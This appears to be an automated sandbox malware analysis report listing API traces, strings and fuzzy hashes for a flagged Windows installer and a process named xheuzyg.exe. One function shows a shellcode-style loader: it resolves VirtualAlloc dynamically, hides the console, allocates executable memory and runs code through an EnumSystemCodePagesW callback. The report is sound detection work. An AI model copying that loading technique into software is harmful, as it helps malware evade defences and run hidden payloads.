Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: d44a61a2a2c95e3216d06c81e49a509776d28ac41f2de2fd4f53c7e5812b41e9
Instruction ID: 4d3ef85e63b9541cbe972d5e7c3a425ff70263948fb1d71cee34ed50e591440d
Opcode Fuzzy Hash: d44a61a2a2c95e3216d06c81e49a509776d28ac41f2de2fd4f53c7e5812b41e9
Instruction Fuzzy Hash: B821A171A44149BEEF02AFF5C94AAEE7B75DF44704F10407EF501BA1D1DAB88A40DB29

Uniqueness

Uniqueness Score: -1.00%

Function 004056BA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00403117,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,?,004032B8), ref: 004056C0
CharPrevA.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,00403117,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,?,004032B8), ref: 004056C9
lstrcatA.KERNEL32(?,00409010), ref: 004056DA

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 004056BA

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user~1\AppData\Local\Temp\
API String ID: 2659869361-2382934351
Opcode ID: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
Instruction ID: 80516fad0c4d4920465a9bb29442f27547f360336c83292ed6deef4f7ecf272a
Opcode Fuzzy Hash: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
Instruction Fuzzy Hash: 88D0A962A09A302AE20223198C05F9B7AA8CF02351B080862F140B6292C27C3C818BFE

Uniqueness

Uniqueness Score: -1.00%

Function 00401F84 Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FAF

Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,0041924B,771B23A0,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041924B,771B23A0,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041924B,771B23A0), ref: 00404F0F
Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
Part of subcall function 00404EB3: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F47
Part of subcall function 00404EB3: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F61
Part of subcall function 00404EB3: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F6F

LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
GetProcAddress.KERNEL32(00000000,?), ref: 00401FCF
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: b551240a240c733a4c981d6ec1ae38ebb0789affcf7669c1ea097dea2b4299ae
Instruction ID: 67208966b8f2bf19d9e960a2271e5cf927c7fdd1345161600271a48ac580282b
Opcode Fuzzy Hash: b551240a240c733a4c981d6ec1ae38ebb0789affcf7669c1ea097dea2b4299ae
Instruction Fuzzy Hash: 48215B36904215EBDF216FA58E4DAAE7970AF44314F20423BFA01B22E0CBBC4941965E

Uniqueness

Uniqueness Score: -1.00%

Function 00402336 Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402374
lstrlenA.KERNEL32(0040A440,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402394
RegSetValueExA.ADVAPI32(?,?,?,?,0040A440,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023CD
RegCloseKey.ADVAPI32(?,?,?,0040A440,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024B0

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID:
API String ID: 1356686001-0
Opcode ID: 0dff74fc9814635757045e0884e09a6858b84c8ed7e39168be7b0d5a6897f032
Instruction ID: 7eaf0ec052d83a67d7bbddc98f61bbb11a40701f4c7c8ad3ea5d843478098636
Opcode Fuzzy Hash: 0dff74fc9814635757045e0884e09a6858b84c8ed7e39168be7b0d5a6897f032
Instruction Fuzzy Hash: 2211A271E00108BFEB10EFA5DE89EAF7678EB40758F20403AF505B31D0D6B85D019A69

Uniqueness

Uniqueness Score: -1.00%

Function 0040574E Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

CharNextA.USER32(00405500,?,C:\,00000000,004057B2,C:\,C:\,?,?,?,00405500,?,C:\Users\user~1\AppData\Local\Temp\,?), ref: 0040575C
CharNextA.USER32(00000000), ref: 00405761
CharNextA.USER32(00000000), ref: 00405770

Strings

C:\, xrefs: 0040574F

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharNext
String ID: C:\
API String ID: 3213498283-3404278061
Opcode ID: df1f57800bc78783e49fb04f649057cff683ac7abc20f7779ba38a9a2f776efc
Instruction ID: 0cb000f169cdbbf2d5b9b6229b91127b5992dce5cf428481544f57f275cdbada
Opcode Fuzzy Hash: df1f57800bc78783e49fb04f649057cff683ac7abc20f7779ba38a9a2f776efc
Instruction Fuzzy Hash: 3FF0A762904A25D6EB3322A85C44F6B57ACDB55725F140477E100BB1D192BC4C82AFEA

Uniqueness

Uniqueness Score: -1.00%

Function 00401D38 Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D3F
GetDeviceCaps.GDI32(00000000), ref: 00401D46
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D55
CreateFontIndirectA.GDI32(0040B044), ref: 00401DA7

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirect
String ID:
API String ID: 3272661963-0
Opcode ID: 8ab92fdc2903857b72d1cffa18b3104b68d957a3c6a7ba5d3e2689a32af85142
Instruction ID: d817c33c406d5a72f0d35d0353d877ca697365183e6ac762242a66cad999de2e
Opcode Fuzzy Hash: 8ab92fdc2903857b72d1cffa18b3104b68d957a3c6a7ba5d3e2689a32af85142
Instruction Fuzzy Hash: DFF06871A482C0AFE70167709F5AB9B3F64D712305F104476F251BA2E3C77D14448BAD

Uniqueness

Uniqueness Score: -1.00%

Function 00402BF1 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00402DD1,00000001), ref: 00402C04
GetTickCount.KERNEL32 ref: 00402C22
CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C3F
ShowWindow.USER32(00000000,00000005), ref: 00402C4D

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 314feb9a6f5b037bccdbcd606c1efed59a9f25e3e49878e5389ae12efd8f53aa
Instruction ID: af7afb5c67b035eb61978086e86d3b64d4827bf2199b448f7584534e2ab44da5
Opcode Fuzzy Hash: 314feb9a6f5b037bccdbcd606c1efed59a9f25e3e49878e5389ae12efd8f53aa
Instruction Fuzzy Hash: 46F0E270A0D260ABC3746F66FE8C98F7BA4F744B017400876F104B11E9CA7858C68B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00404E03 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404E39
CallWindowProcA.USER32(?,00000200,?,?), ref: 00404EA7

Part of subcall function 00403ECF: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403EE1

Strings

, xrefs: 00404E11

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: bb110161f1a3672e5f414d3b7256019bd36f5b3292f6cf5a111e70d7da7d909c
Instruction ID: a1b1c3265e10147a864b820895246e20bcc7fdce94b5a9a997a836c51e1a414d
Opcode Fuzzy Hash: bb110161f1a3672e5f414d3b7256019bd36f5b3292f6cf5a111e70d7da7d909c
Instruction Fuzzy Hash: 4C113D71500218ABDB215F51DC44E9B3B69FB44759F00803AFA18691D1C77C5D619FAE

Uniqueness

Uniqueness Score: -1.00%

Function 00403585 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00000000,?,0040355D,00403366,00000020), ref: 0040359F
GlobalFree.KERNEL32(?), ref: 004035A6

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403597

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user~1\AppData\Local\Temp\
API String ID: 1100898210-2382934351
Opcode ID: ac7f27994bd3325b2d0095e79668b7c9fa9e3b8299eadab29ed3cfae008e212f
Instruction ID: 66eb0e2672836502cdeb887367c424fec6a3009010210fcd00c586b28cfd98d1
Opcode Fuzzy Hash: ac7f27994bd3325b2d0095e79668b7c9fa9e3b8299eadab29ed3cfae008e212f
Instruction Fuzzy Hash: 45E0C233900130A7CB715F44EC0475A776C6F49B22F010067ED00772B0C3742D424BD8

Uniqueness

Uniqueness Score: -1.00%

Function 00405701 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe,C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe,80000000,00000003), ref: 00405707
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe,C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe,80000000,00000003), ref: 00405715

Strings

C:\Users\user\Desktop, xrefs: 00405701

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3976562730
Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
Instruction ID: 28705abfcf709d76dd5e93a9f01d56f8a4c6275228320a945a5a59c68c4d3cd5
Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
Instruction Fuzzy Hash: 21D0A762409D709EF30363148C04B9F7A88CF12300F0904A2E580A3191C2785C414BBD

Uniqueness

Uniqueness Score: -1.00%

Function 00405813 Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405833
CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405841
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
Instruction ID: 367b043075f01b00bc0f53d251d01435816a13b74582d12395b7b535bec4825a
Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
Instruction Fuzzy Hash: 2BF02737208D51AFC2026B255C0092B7F94EF91310B24043EF840F2180E339A8219BBB

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: xheuzyg.exePID: 1356, Parent PID: 5364COMMON

Execution Graph

Execution Coverage:	13.4%
Dynamic/Decrypted Code Coverage:	5.5%
Signature Coverage:	3.2%
Total number of Nodes:	1887
Total number of Limit Nodes:	22

Executed Functions

Function 001A2015 Relevance: 3838.4, APIs: 6, Strings: 2184, Instructions: 5861
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(Kernel32.dll,VirtualAlloc), ref: 001ABBEA
GetProcAddress.KERNEL32(00000000), ref: 001ABBF1
GetConsoleWindow.KERNELBASE(00000000), ref: 001ABBFF
ShowWindow.USER32(00000000), ref: 001ABC06

Part of subcall function 001B681A: RtlAllocateHeap.NTDLL(00000000,00000016,?,?,00000003,001B5271,?,001B50D5,?,00000016,001B5A86), ref: 001B7362

VirtualAlloc.KERNELBASE(00000000,0000166E,00003000,00000040), ref: 001ABCB0
EnumSystemCodePagesW.KERNELBASE(?,00000000), ref: 001ABCDA

Strings

S, xrefs: 001A8F6C
), xrefs: 001A5BF6
(, xrefs: 001A3B11
;, xrefs: 001A7DE5
I, xrefs: 001A2E0D
D, xrefs: 001A9959
c, xrefs: 001A2CA1
#, xrefs: 001AA7FA
I, xrefs: 001AA9CF
W, xrefs: 001A64C4
\, xrefs: 001A5551
[, xrefs: 001AB87E
4, xrefs: 001A4CC2
D, xrefs: 001A8697
y, xrefs: 001A5607
k, xrefs: 001A8B83
(, xrefs: 001A5F53
y, xrefs: 001A349D
), xrefs: 001A5C74
\, xrefs: 001A6B23
K, xrefs: 001A8C01
C, xrefs: 001A31B7
C, xrefs: 001A52AA
|, xrefs: 001A516F
$, xrefs: 001A6232
;, xrefs: 001AAD3A
|, xrefs: 001A4066
%, xrefs: 001A3C37
9, xrefs: 001A9952
', xrefs: 001A7580
k, xrefs: 001A266C
S, xrefs: 001AB81C
n, xrefs: 001A491F
9, xrefs: 001A49B2
9, xrefs: 001AB3FB
h, xrefs: 001AA904
0, xrefs: 001A968F
O, xrefs: 001AA5C3
s, xrefs: 001A2681
h, xrefs: 001A4870
S, xrefs: 001A9117
d, xrefs: 001A84AD
l, xrefs: 001A7BA0
f, xrefs: 001A770F
I, xrefs: 001A5F76
{, xrefs: 001A649A
M, xrefs: 001A2983
T, xrefs: 001A63CF
s, xrefs: 001AAEDE
(, xrefs: 001AB885
\, xrefs: 001A81F1
c, xrefs: 001AA300
+, xrefs: 001AADB8
l, xrefs: 001A4D08
{, xrefs: 001A92DE
y, xrefs: 001A393C
c, xrefs: 001A8C40
C, xrefs: 001A3BAB
<, xrefs: 001A2A6A
x, xrefs: 001A6493
P, xrefs: 001A575E
\, xrefs: 001AA74B
/, xrefs: 001AB487
#, xrefs: 001A9298
|, xrefs: 001A6DDF
3, xrefs: 001A55B3
S, xrefs: 001A3F08
', xrefs: 001A45BB
|, xrefs: 001ABB12
{, xrefs: 001A4782
k, xrefs: 001A25CB
T, xrefs: 001A2BA5
D, xrefs: 001A5ADE
D, xrefs: 001ABB1A
d, xrefs: 001A29AD
;, xrefs: 001A5DA8
/, xrefs: 001A946D
D, xrefs: 001A5C90
+, xrefs: 001A5D4D
q, xrefs: 001AAB50
S, xrefs: 001A22D7
R, xrefs: 001AA26D
k, xrefs: 001A9156
C, xrefs: 001AAB3B
x, xrefs: 001A40EB
[, xrefs: 001AB720
w, xrefs: 001A3411
d, xrefs: 001A9A01
T, xrefs: 001AA370
x, xrefs: 001A61EC
@, xrefs: 001A59F7
;, xrefs: 001A2E61
l, xrefs: 001A84DE
A, xrefs: 001A90DF
., xrefs: 001A7675
g, xrefs: 001A2195
6, xrefs: 001A335B
p, xrefs: 001A5161
;, xrefs: 001A3E4B
\, xrefs: 001ABB0E
S, xrefs: 001A3680
A, xrefs: 001A23BE
9, xrefs: 001A4CA6
4, xrefs: 001A46B7
L, xrefs: 001A2A8D
', xrefs: 001A6F75
$, xrefs: 001A717B
T, xrefs: 001A4E20
S, xrefs: 001A30B4
Y, xrefs: 001A39A5
r, xrefs: 001AB513
I, xrefs: 001A72A8
P, xrefs: 001A51A0
L, xrefs: 001A6C03
y, xrefs: 001AB417
%, xrefs: 001A7200
l, xrefs: 001A52F7
9, xrefs: 001A5E50
\, xrefs: 001AA4C0
K, xrefs: 001A8F26
}, xrefs: 001AB926
;, xrefs: 001AA3BD
", xrefs: 001AAE4B
s, xrefs: 001A216B
\, xrefs: 001A4E58
,, xrefs: 001A5106
?, xrefs: 001A2419
d, xrefs: 001A6AC8
S, xrefs: 001A8498
?, xrefs: 001A31F6
q, xrefs: 001AA052
{, xrefs: 001A482A
X, xrefs: 001A35D1
S, xrefs: 001A41C4
;, xrefs: 001A4FCB
i, xrefs: 001A5F30
], xrefs: 001A89A7
T, xrefs: 001A5AC2
', xrefs: 001A2895
P, xrefs: 001A2B4A
{, xrefs: 001A8B3D
^, xrefs: 001A5A8A
s, xrefs: 001A54DA
-, xrefs: 001A5153
1, xrefs: 001A2347
Kernel32.dll, xrefs: 001ABBE5
G, xrefs: 001A4DBE
c, xrefs: 001A2451
m, xrefs: 001A32A5
,, xrefs: 001ABA8E
w, xrefs: 001A7ECC
=, xrefs: 001A222F
c, xrefs: 001A5D54
Z, xrefs: 001A8770
+, xrefs: 001A6AA5
C, xrefs: 001A7C95
x, xrefs: 001A33E0
d, xrefs: 001A7786
Q, xrefs: 001A722A
;, xrefs: 001AB004
,, xrefs: 001A6438
\, xrefs: 001A6CC7
%, xrefs: 001A9180
W, xrefs: 001A4193
W, xrefs: 001A7B1B
_, xrefs: 001AABCE
g, xrefs: 001A8DA5
;, xrefs: 001A984F
d, xrefs: 001A506C
o, xrefs: 001A89DF
;, xrefs: 001AAA2A
3, xrefs: 001AAA5B
w, xrefs: 001A94D6
t, xrefs: 001A8F50
d, xrefs: 001A5233
-, xrefs: 001A9029
{, xrefs: 001A2EA0
8, xrefs: 001A50AB
', xrefs: 001A23F6
;, xrefs: 001A3FBE
*, xrefs: 001A7C5D
w, xrefs: 001A84C2
#, xrefs: 001A263B
;, xrefs: 001AA88D
O, xrefs: 001A54F6
K, xrefs: 001AA4EA
;, xrefs: 001AAB57
', xrefs: 001A2673
S, xrefs: 001A3E91
+, xrefs: 001A2316
h, xrefs: 001AB4F7
d, xrefs: 001A317F
T, xrefs: 001A3F32
f, xrefs: 001A7C09
9, xrefs: 001A75C6
), xrefs: 001A2EAE
?, xrefs: 001AA5D8
U, xrefs: 001A5DF5
\, xrefs: 001A4FAF
', xrefs: 001AB831
,, xrefs: 001A986B
[, xrefs: 001A2102
+, xrefs: 001A2110
9, xrefs: 001A5A67
t, xrefs: 001A8276
g, xrefs: 001A680C
d, xrefs: 001A6F59
?, xrefs: 001A8857
,, xrefs: 001ABAC2
l, xrefs: 001A604F
y, xrefs: 001A7C10
S, xrefs: 001A9936
#, xrefs: 001AA522
8, xrefs: 001A49EA
q, xrefs: 001A270D
(, xrefs: 001A3AB6
@, xrefs: 001A83A3
&, xrefs: 001A4020
d, xrefs: 001A8571
!, xrefs: 001AAC5A
p, xrefs: 001A8ECB
@, xrefs: 001A50CE
l, xrefs: 001A776A
/, xrefs: 001A99C2
', xrefs: 001A2BC8
M, xrefs: 001A4981
+, xrefs: 001A9C4D
w, xrefs: 001A5D07
W, xrefs: 001A6CE3
`, xrefs: 001A7FF9
_, xrefs: 001A7FBA
;, xrefs: 001A9FF7
n, xrefs: 001AA204
d, xrefs: 001A2B74
7, xrefs: 001A3824
+, xrefs: 001A46FD
=, xrefs: 001ABACE
O, xrefs: 001A9DF1
@, xrefs: 001A4185
{, xrefs: 001A490A
y, xrefs: 001A57CE
a, xrefs: 001A2ADA
w, xrefs: 001A83B1
O, xrefs: 001A3B34
', xrefs: 001A790E
2, xrefs: 001A2A32
4, xrefs: 001A9DCE
[, xrefs: 001A4AF4
d, xrefs: 001A5344
D, xrefs: 001A5A28
